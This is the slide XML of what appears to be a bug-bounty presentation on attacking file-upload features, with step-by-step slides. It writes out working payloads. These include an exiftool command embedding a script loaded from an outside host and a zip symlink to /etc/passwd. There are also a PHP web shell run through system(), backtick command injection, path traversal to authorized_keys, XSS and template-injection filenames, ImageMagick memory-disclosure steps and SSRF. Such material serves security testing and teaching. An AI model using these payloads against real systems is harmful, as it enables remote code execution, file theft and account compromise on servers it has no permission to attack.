              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 -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Write This Command</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exiftool '-Caption-Abstract="&gt;&lt;script src="http://me.com/xss.js" </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       id="boom"&gt;&lt;/script&gt;&lt;img s="' img.png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3 -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Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> img.jpg </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To The Server</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="745" name="Google Shape;745;p82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46" name="Google Shape;746;p82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82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748" name="Google Shape;748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Google Shape;749;p82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Synack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750" name="Google Shape;750;p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025" y="2675525"/>
            <a:ext cx="421001" cy="359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83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If You Can Upload Zip File Try To Generate</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ZIP Symbolic Link </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Read Local Files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756" name="Google Shape;756;p83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Steps to produce :-</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 -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Open Your Terminal</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 -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Write This Commands</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     ln -s /etc/passwd link</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     zip --symlinks test.zip link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3 -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Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> test.zip </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To The Server</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     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757" name="Google Shape;757;p83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58" name="Google Shape;758;p83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83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760" name="Google Shape;760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p83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Payloads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762" name="Google Shape;762;p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84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If You Can Upload </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To PHP Server , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To ASP Server OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> __init__.py</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Python Server , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You Can Execute Code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768" name="Google Shape;768;p84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Steps to produce :-</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 -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Change File Name To .</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htaccess , web.config , </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     httpd.conf </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> __init__py</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 -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Forward The Request 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3 -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If Server Accept Them , Upload One From</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     This </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Links On The Left</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     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769" name="Google Shape;769;p84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70" name="Google Shape;770;p84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84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772" name="Google Shape;772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p84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Payloads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774" name="Google Shape;774;p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775" name="Google Shape;775;p84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Payloads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776" name="Google Shape;776;p84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Payloads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777" name="Google Shape;777;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="387947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Payloads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778" name="Google Shape;778;p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025" y="3100363"/>
            <a:ext cx="421000" cy="3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025" y="3523363"/>
            <a:ext cx="421000" cy="3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0" name="Google Shape;780;p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3922475"/>
            <a:ext cx="421000" cy="3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85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Whatever</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Extension</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ! To Ignore Response Header </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Content-Type-Options: nosniff</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , And If It Is Self Try To Use OAuth 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786" name="Google Shape;786;p85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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.whatever</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plain/text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&lt;script&gt;alert(1)&lt;/script&gt;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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="787" name="Google Shape;787;p85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88" name="Google Shape;788;p85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85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790" name="Google Shape;790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1" name="Google Shape;791;p85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F3F3F3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F3F3F3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="792" name="Google Shape;792;p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86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Race Condition </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>technique</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Bypass MIME Filters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798" name="Google Shape;798;p86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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.php</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/octet-stream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&lt;? Php ob_end_clean() ; echo '&lt;pre&gt;' ; system(stripslashes($_REQUEST['command'])) ; echo '&lt;pre&gt;' ; exit ; ?&gt;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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="799" name="Google Shape;799;p86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00" name="Google Shape;800;p86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86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802" name="Google Shape;802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3" name="Google Shape;803;p86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804" name="Google Shape;804;p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025" y="2675525"/>
            <a:ext cx="4210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87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Inject OS Command</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. %60sleep%2011%60 In Size Of The Image </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394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To Get RCE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810" name="Google Shape;810;p87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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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------WebKitFormBoundary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Content-Disposition: form-data; name="MAX_FILE_SIZE"</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%60sleep%2050%60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Content-Disposition: form-data; name="file"; filename="image.png"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Content-Type: image/png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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="811" name="Google Shape;811;p87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12" name="Google Shape;812;p87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87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814" name="Google Shape;814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5" name="Google Shape;815;p87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816" name="Google Shape;816;p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350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88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If There Is Path Parameter Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Put </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../../../../var/opt/gitlab/.ssh/authorized_keys</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394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OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> .../.../.../.../.../.../.../.../etc/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get LFI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822" name="Google Shape;822;p88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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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------WebKitFormBoundary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Content-Disposition: form-data; name="path"</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../../../../../../../var/opt/gitlab/.ssh/authorized_keys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Content-Disposition: form-data; name="file"; filename="image.png"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Content-Type: image/png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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="823" name="Google Shape;823;p88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24" name="Google Shape;824;p88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88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826" name="Google Shape;826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7" name="Google Shape;827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025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828" name="Google Shape;828;p88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829" name="Google Shape;829;p88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830" name="Google Shape;830;p8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025" y="3067788"/>
            <a:ext cx="4210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4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200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Put File Name As XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. '"&gt;&lt;img src=x onerror=alert(document.domain)&gt;.extension</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en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OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{constructor.constructor('alert(1)')()}}.extension</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get XSS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248" name="Google Shape;248;p44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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'"&gt;&lt;img src=x onerror=alert(document.domain)&gt;.png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/png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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Google Shape;249;p44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50" name="Google Shape;250;p44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44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52" name="Google Shape;25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4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54" name="Google Shape;254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025" y="2675525"/>
            <a:ext cx="4210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4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56" name="Google Shape;256;p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025" y="3091500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4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58" name="Google Shape;258;p4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4025" y="3544600"/>
            <a:ext cx="421000" cy="3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89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36" name="Google Shape;836;p89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89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838" name="Google Shape;838;p89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ImageMagick GIF Coder To Lead To Memory Disclosure</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To collect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Server Information Related To OS and Path Directory And Many More </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="839" name="Google Shape;839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0" name="Google Shape;840;p89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Steps to produce :-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>
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 -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Creating exploitable files e.g.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     ./gifoeb gen 512x512 dump.gif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2 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> U</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pload dump.gif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3 -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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download The File , Called e.g. download.gif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4 -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Recovery Information e.g.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     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./gifoeb recover download.gif | strings;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FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="841" name="Google Shape;841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025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842" name="Google Shape;842;p89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90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48" name="Google Shape;848;p90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90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850" name="Google Shape;850;p90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Change  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type="file" </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> type="url" </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>And Submit A URL</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. https://me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To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Get SSRF</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="851" name="Google Shape;851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2" name="Google Shape;852;p90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Steps to produce :-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>
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 -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Click Right , Choose </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inspect Element (Q)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2 -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C</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hange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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type="file" </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> type="url"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3 -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Submit A URL</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. https://me.com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FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="853" name="Google Shape;853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025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854" name="Google Shape;854;p90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855" name="Google Shape;855;p90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856" name="Google Shape;856;p9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2925" y="3110050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91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If There Is Option To Upload From Your Domain , Try To Figure Out If There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Is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Range Header</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
